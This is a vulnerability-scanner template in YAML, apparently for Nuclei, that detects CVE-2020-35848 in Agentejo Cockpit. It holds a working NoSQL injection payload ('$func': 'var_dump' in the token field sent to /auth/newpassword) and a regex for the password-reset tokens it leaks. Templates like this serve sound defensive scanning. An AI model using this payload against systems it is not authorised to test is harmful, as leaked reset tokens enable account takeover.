40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
|
id: CVE-2020-35848
|
||
|
|
||
|
info:
|
||
|
name: Agentejo Cockpit <0.12.0 - NoSQL Injection
|
||
|
author: dwisiswant0
|
||
|
severity: critical
|
||
|
description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
|
||
|
reference:
|
||
|
- https://swarm.ptsecurity.com/rce-cockpit-cms/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-35848
|
||
|
- https://getcockpit.com/
|
||
|
- https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cve-id: CVE-2020-35848
|
||
|
cwe-id: CWE-89
|
||
|
tags: cve,cve2020,nosqli,sqli,cockpit,injection
|
||
|
|
||
|
http:
|
||
|
- method: POST
|
||
|
path:
|
||
|
- "{{BaseURL}}/auth/newpassword"
|
||
|
headers:
|
||
|
Content-Type: application/json
|
||
|
body: |
|
||
|
{
|
||
|
"token": {
|
||
|
"$func": "var_dump"
|
||
|
}
|
||
|
}
|
||
|
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
part: body
|
||
|
regex:
|
||
|
- 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"'
|
||
|
|
||
|
# Enhanced by mp on 2022/04/28
|